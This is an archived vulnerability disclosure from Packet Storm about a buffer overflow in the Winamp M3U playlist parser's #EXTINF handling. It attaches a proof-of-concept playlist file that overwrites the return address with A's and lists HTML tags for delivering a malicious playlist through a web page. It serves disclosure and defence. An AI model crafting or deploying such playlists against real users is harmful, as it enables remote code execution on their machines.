Winamp contains a buffer overflow in its M3U playlist parser. It is possible to execute arbitrary code on a remote computer via a malicious playlist. Proof of concept playlist included.
9765035f7869f821c9fe0e6fe3c9d6e919118bc1a0033378ca09f8927214f384This is a multi-part message in MIME format.
------=_NextPart_000_6492_74c$21af
Content-Type: text/plain; format=flowed
LEGAL NOTICE:
By reading this you do agree that life does not make
sense and it doesn't need to. You also agree to
wear a condom. You do agree to think about nature.
.. umm you also agree to GPL all software you've ever
written.
[Click here if you're under 18]
There is a buffer overflow security vulnerability in
Winamp's (http://www.winamp.com) M3U playlist parser.
The overflow happens when an M3U extension called "#EXTINF:" is being
handled. The size of the parameter
following that keyword is not checked.
Real world example:
--cut-here-and-paste-to-a-file-with-m3u-extension--
#EXTM3U
#EXTINF:AAAAAAAAA....AAAAAAAAA<cr><lf>
--cut here--
There should be at least 280 A's.
The overflow allows total control over ones computer.
For example one could embedd an M3U file to a web page
several ways:
- <A HREF="ATTACK.M3U">
- <BGSOUND SRC="ATTACK.M3U">
- <EMBED SRC="ATTACK.M3U">
I have tested the first one but I have Media Player
installed on this computer and my browser uses its
components for the latter two so I cannot confirm..
The only problem is some structure (FILE *?) after
the buffer because it has a zero in it and it must
not be crafted to successfully return from the function.
I had to apply some trial and error to get code executed.
Currently the code crafts Winamp's MOD file format support
until restarted (I presume so.. :-).
The attached .M3U file should crash Winamp at 0000:41414141. I've tested it
with Windows 98 and
Windows 95 with Winamp versions 2.62 and 2.64.
Thank you.. I might not be available too frequently
to answer your mail.. Have a nice life. Bye.
________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com
------=_NextPart_000_6492_74c$21af
Content-Type: text/plain; name="ATTACK.M3U"; format=flowed
Content-Transfer-Encoding: 8bit
Content-Disposition: attachment; filename="ATTACK.M3U"
#EXTM3U
#EXTINF:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ¡PPPPAAAA
------=_NextPart_000_6492_74c$21af--
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed